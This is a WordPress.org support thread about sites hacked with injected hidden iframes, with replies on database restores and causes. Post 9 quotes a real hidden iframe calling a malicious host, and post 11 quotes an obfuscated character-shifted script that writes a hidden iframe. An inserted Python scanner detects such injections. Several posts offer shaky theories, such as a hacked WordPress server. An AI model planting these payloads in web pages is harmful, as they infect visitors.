WordPress.org

[resolved] Someone put an iframe on index.php file (20 posts)

  1. Hiuxing
    Member
    Posted 5 years ago #

    Hi.

    Today I found out that someone changed the index.php file of my WordPress blog and put an iframe in it, so that people get a virus when they visit my website. I downloaded WordPress again and uploaded the regular index.php file.
    But my website still doesn't work.

    So I backed up my content and deleted everything.
    I uploaded WordPress again, but it seems that the new WordPress installation doesn't connect with my old MySQL database.

    What should I do?
    I don't want to lose all my content. :(

    I tried desperately everything I could do with no results.
    I hope someone can help me here.

    Thanks in advance,
    Hiuxing.

  2. Hiuxing
    Member
    Posted 5 years ago #

    My website is http://morningsundesigns.com/ btw.

  3. whooami
    Member
    Posted 5 years ago #

    restoring a backup, assuming that's what you are trying to do, is no more difficult than uploading the files, to EXACTLY where they were before.

    if your wp-config.php contains the right info -- it connects.

    if it doesn't have the right info -- it doesn't.

    it's not any more complicated than that.

    So if you can't connect to your database, and you've checked to make sure that it still exists, and that the tables from your old install are still intact, then your wp-config.php that you are trying to use does not have the right info in it.

  4. whooami
    Member
    Posted 5 years ago #

    oh, and btw, unless you've solved the source of your first hacking, you should expect to be hacked again.

    I suggest scanning your own local computer(s) for malware.

  5. Hiuxing
    Member
    Posted 5 years ago #

    First of all, thank you so much for replying.

    Should I empty my database too?
    Anyway, I uploaded my backup config file to my site, but it still doesn't work.

    I even tried installing WordPress via Fantastico installer.
    I got a brand new MySQL database and the default theme came up and worked.
    I deleted the files in my new MySQL database and imported it with the files I exported from my old MySQL.
    And now it just gives me a blank page?

  6. Ryan S
    Member
    Posted 5 years ago #

    Yes.. look in your database, I think you will need to check whole database. I am not sure if there is any easy way to check this..

  7. stoneybroke
    Member
    Posted 5 years ago #

    I have been having the same problems myself with the index.php file, and others. After a lot of digging about I have found the following post: http://forums.digitalpoint.com/showthread.php?t=901622. Basically your site has been HACKED. The hackers have somehow managed to obtain your FTP or root password, so check your computer for key loggers and follow the advice in the above post and see if that will do the job.

  8. gariben
    Member
    Posted 5 years ago #

    definitely a FTP password hack.

    I think most people who were hacked had Adobe Reader 8.0 and using FileZilla

  9. Kevin S
    Member
    Posted 5 years ago #

    This week one of the sites I work on was hacked and an iframe was placed in all index.php files, plus in the functions.php file in the wp-includes folder.

    The specific hack code is:
    <iframe src="http://filmproductionlifemedia.cn:8080/ts/in.cgi?pepsi70" width=125 height=125 style="visibility: hidden"></iframe>

    This code often overwrites the ending php tags in the file and thus brings the site down.

    I have seen a couple of other threads on this (links at bottom), but not exactly the same code example, so wanted to bring it to light here to:

    * Gauge how often it’s happening
    * Share solutions
    * Expose the culprits, if possible
    * Alert WP team so they can review possible core level security measures

    As to remedies and security measures to take, the other threads have given some good advice, and I plan to sweep my machine and those of other team members with FTP access (could be a virus attached to our systems), check recent plugins, scan for viruses on the hosting servers, and change all relevant security codes and settings. I will report again here, and encourage you to do the same.
    [link moderated]

  10. Elpie
    Member
    Posted 5 years ago #

    > definitely a FTP password hack.
    >
    > I think most people who were hacked had Adobe Reader 8.0 and using FileZilla

    This is plain rubbish! I've also had sites hacked with both JavaScript injection and iframe. Not only is FTP not used, it's not even enabled on the server. Interestingly, the attack vectors show that entry was gained from a core WordPress file.

    I had just written a report for the WP core devs when I saw the announcement about the release of WordPress 2.8.1.
    Everyone should upgrade as soon as possible.

    More information on known vulnerabilities (some of which have been fixed in 2.8.1) is here: http://corelabs.coresecurity.com/index.php?module=FrontEndMod&action=view&type=advisory&name=WordPress_Privileges_Unchecked

  11. bartoli3000
    Member
    Posted 5 years ago #

    I've had the same kind of issues the last few weeks. All of my index files in the root were altered and all of my php files were changed. They had the following "script" added at the bottom end:

    ===
    ?php echo '<script>var source="=tdsjqu?epdvnfou/xsjuf)voftdbqf)(&4Djgsbnf&31tsd&4E&33iuuq&4B00gpytfnqsptu/sv0jo/dhj&4G5&33&31xjeui&4E&331&33&31ifjhiu&4E&331&33&31tuzmf&4E&33ejtqmbz&4Bopof&4C&33&4F&4D0jgsbnf&4F(**<=0tdsjqu?"; var result = "";for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);document.write(result);</script>'; ?>
    ===

    The result was that my site went totally blank, even no error at all. After removing the "script", the site was back ok. But only for a few days, even hours later, the "script" was back. I did some changes; wp_ changed, file security 644, installed the security plugin, but with no result, the hacks came back.

    I just did the upgrade to 281 and I keep my fingers crossed...
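
Added example, not part of any post in this thread: a small Python scanner for the two injection styles quoted above, the plain hidden iframe and the script whose string is shifted by one character code and then passed through `unescape()`. The function names, the file suffix list and the `malware.example.invalid` sample are assumptions made for illustration; the sample input is constructed with the same encoding scheme.

```python
import re
from pathlib import Path
from urllib.parse import quote, unquote

# Iframe hidden by CSS or shrunk to 0/1 pixel, as in the injections quoted in this thread.
HIDDEN_IFRAME = re.compile(
    r"<iframe\b[^>]*(?:visibility\s*:\s*hidden|display\s*:\s*none"
    r"|(?:width|height)\s*=\s*[\"']?[01](?!\d))[^>]*>", re.I)
# A JS string literal followed by a loop applying charCodeAt(i) - N to it.
SHIFTED_JS = re.compile(
    r'var\s+\w+\s*=\s*"([^"]+)"\s*;.*?charCodeAt\(\s*\w+\s*\)\s*-\s*(\d+)', re.S)

def unshift(encoded, shift):
    """Undo the per-character shift (modulo keeps chr() in range on odd input)."""
    return "".join(chr((ord(c) - shift) % 0x110000) for c in encoded)

def scan_text(text):
    """Return (kind, matched_tag) for each hidden iframe, plain or obfuscated."""
    findings = [("hidden-iframe", m.group(0)) for m in HIDDEN_IFRAME.finditer(text)]
    for m in SHIFTED_JS.finditer(text):
        # Two layers: character shift, then the %XX escapes fed to unescape().
        decoded = unquote(unshift(m.group(1), int(m.group(2))))
        findings += [("obfuscated-iframe", h.group(0))
                     for h in HIDDEN_IFRAME.finditer(decoded)]
    return findings

def scan_tree(root, suffixes=(".php", ".html", ".htm", ".js")):
    """Map each file under root that contains a finding to its findings."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            hits = scan_text(path.read_text(errors="replace"))
            if hits:
                report[str(path)] = hits
    return report

def make_sample():
    """Constructed test input: harmless placeholder URL, same encoding scheme."""
    iframe = ('<iframe src="http://malware.example.invalid/in.cgi" '
              'width="1" height="1" style="display:none"></iframe>')
    js = "<script>document.write(unescape('" + quote(iframe, safe="") + "'))</script>"
    shifted = "".join(chr(ord(c) + 1) for c in js)
    return ("<?php get_footer(); ?>\n<?php echo '<script>var source=\"" + shifted
            + '"; var result = "";for(var i=0;i<source.length;i++) result+='
            "String.fromCharCode(source.charCodeAt(i)-1);document.write(result);"
            "</script>'; ?>")
```

Running `scan_tree()` over a downloaded copy of the site lists every file that still carries an injection, which helps when the code keeps coming back after a cleanup.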

  12. bartoli3000
    Member
    Posted 5 years ago #

    Ok, I'm back with more news.

    After upgrading to 281 I got hacked again...

    I manually scanned my PC with Avast, and I did find some worms and malware in my IE cache, which I suspect did the damage on my website in the first place. Then I changed all of my passwords (sql, ftp, ...) and have had no more intrusions since.

  13. gariben
    Member
    Posted 5 years ago #

    @bartoli3000
    do you have Adobe Reader installed? if so, what version?

  14. Hiuxing
    Member
    Posted 5 years ago #

    Thanks for all the replies.
    It's solved and I'm really happy that it is not happening anymore! :D

    Thanks a lot again!

  15. cyberhrc
    Member
    Posted 5 years ago #

    no adobe reader here nor filezilla
    2.8.1 wordpress up and still problems with getting iframe script
    ftp pass is changed, PC is clean ....

    hope for better days

  16. Kevin S
    Member
    Posted 5 years ago #

    It was not our WordPress blog that was hacked, but the WordPress main server was hacked and variability was already installed before downloading from the WordPress server. All the details regarding this hack are reviewed in a magazine called Linux. WordPress main server was hacked and injected malicious.

    [link moderated]

  17. annaj
    Member
    Posted 5 years ago #

    Huh, I have got this same problem, but I have got this same problem with forum (SMF) php and html files (index, home and similar).
    I scanned my computer and removed all malicious programs (trojans, adware, malware, key-loggers, *sniffers*) and registry, but still no change ;(
    No IE used, just Fx 3.5.1, Adobe Reader 8, no FileZilla, just TotalCommander (but the attacks came before I used TC to log in to FTP).
    WP version after upgrade (in first attack) was 2.7.1, since 21st July 2.8.2 - upgrade by cPanel...

    Any solutions?

  18. gohlkus
    Member
    Posted 5 years ago #

    Our site has been hacked several times in at least the last week.

    I don't know how they're injecting it, but they were using a php file in the media uploads folder, and now the suspicious activity may be in the podpress plugin.

    I changed the passwords and upgraded to 2.8.2 and deleted the offending files. Unfortunately I have no idea how to diagnose where they're getting in.

  19. syncbox
    Member
    Posted 5 years ago #

    Read the sticky thread regarding podpress and gOOgle.net infections/malware...

  20. thetanooki
    Member
    Posted 4 years ago #

    On the off-chance any of you check this topic again, how did you go about fixing the blank pages?

    I seem to have had a similar iframe virus affect my site. I've changed the passwords and uploaded/installed a clean version of the latest WordPress. It seems all fine and dandy now until I import my old database, after which point all my pages go completely blank. (This was happening to the previously existing site too, almost as soon as the virus hit.)

    Some of you mentioned this being a script at the end of your PHP files, but this is clearly a database issue for me. Still, I'd like to know what you did in your scenario to solve it.

This topic has been closed to new replies.